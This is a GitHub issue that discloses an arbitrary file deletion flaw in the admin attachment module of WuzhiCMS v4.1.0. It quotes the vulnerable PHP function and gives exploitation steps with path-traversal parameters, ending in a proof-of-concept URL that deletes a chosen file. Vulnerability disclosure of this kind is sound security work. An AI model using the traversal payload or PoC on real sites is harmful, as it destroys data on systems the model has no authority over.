Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

wuzhicms v4.1.0 Any file deletion vulnerability exists in the background #191

Open
purple-WL opened this issue Aug 25, 2020 · 0 comments
Open

Comments

@purple-WL
Copy link

purple-WL commented Aug 25, 2020

Any file deletion vulnerability was found in WuzhicMS V4.1.0, which allows an attacker to delete any other file.The exploit condition is the login background and Directory overflow.
Vulnerable Files:coreframe\app\attachment\admin\index.php

/**
     * 删除文件
     *
     * @author tuzwu
     * @createtime
     * @modifytime
     * @param
     * @return
     */
    public function del()
    {
        $id = isset($GLOBALS['id']) ? $GLOBALS['id'] : '';
        $url = isset($GLOBALS['url']) ? remove_xss($GLOBALS['url']) : '';
        if (!$id && !$url) MSG(L('operation_failure'), HTTP_REFERER, 3000);
        if ($id) {
        	if(!is_array($id)) {
				$ids = array($id);
			} else {
				$ids = $id;
			}

			foreach($ids as $id) {
				$where = array('id' => $id);
				$att_info = $this->db->get_one('attachment', $where, 'usertimes,path');
				if ($att_info['usertimes'] > 1) {
					$this->db->update('attachment', 'usertimes = usertimes-1', $where);
				}
				else {
					$this->my_unlink(ATTACHMENT_ROOT . $att_info['path']);
					$this->db->delete('attachment', $where);
					$this->db->delete('attachment_tag_index', array('att_id'=>$id));
				}
			}
			MSG(L('delete success'), HTTP_REFERER, 1000);
        }
else {
            if (!$url) MSG('url del ' . L('operation_failure'), HTTP_REFERER, 3000);
            $path = str_ireplace(ATTACHMENT_URL, '', $url);
            if ($path) {
                $where = array('path' => $path);
                $att_info = $this->db->get_one('attachment', $where, 'usertimes,id');

                if (empty($att_info)) {
                    $this->my_unlink(ATTACHMENT_ROOT . $path);
                    MSG(L('operation_success'), HTTP_REFERER, 3000);
                }

                if ($att_info['usertimes'] > 1) {
                    $this->db->update('attachment', 'usertimes = usertimes-1', array('id' => $att_info['id']));
                }
                else {
                    $this->my_unlink(ATTACHMENT_ROOT . $path);
                    $this->db->delete('attachment', array('id' => $att_info['id']));
                    MSG(L('operation_success'), HTTP_REFERER, 3000);
                }
            }
            else {
                MSG(L('operation_failure'), HTTP_REFERER, 3000);
            }
        }
    }

exploitation of vulnerability:

  1. Enter the directory mode of the extension module
    微信截图_20200825103337
    2.In directory mode, click return to the previous directory
    微信截图_20200825103555
    3.Discover parameters by capturing packets "dir=.",Change the parameter to "dir=.."
    微信截图_20200825103747
    After the directory overflow, more delete options were found than before
    微信截图_20200825104046
    4.Remove robots.txt as a test,Click delete robots.txt
    微信截图_20200825104729
    Delete the success!
    微信截图_20200825104939
    5.We discover parameters by request:"url=../robots.txt",Let's try to change the path to something else
    微信截图_20200825105026
    6.A new test.php file was created on disk for the test
    微信截图_20200825105331
    7.Change the parameter to "URL =../../../../../../../../test.php
    微信截图_20200825105640
    Delete the success!Test.php cannot be found.
    微信截图_20200825105554

The POC is as follows: The path and parameters are determined according to the actual situation
http://example.com/index.php?v=del&url=../../../../../../../../test.php&m=attachment&f=index&_su=wuzhicms&_menuid=29&_submenuid=52

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant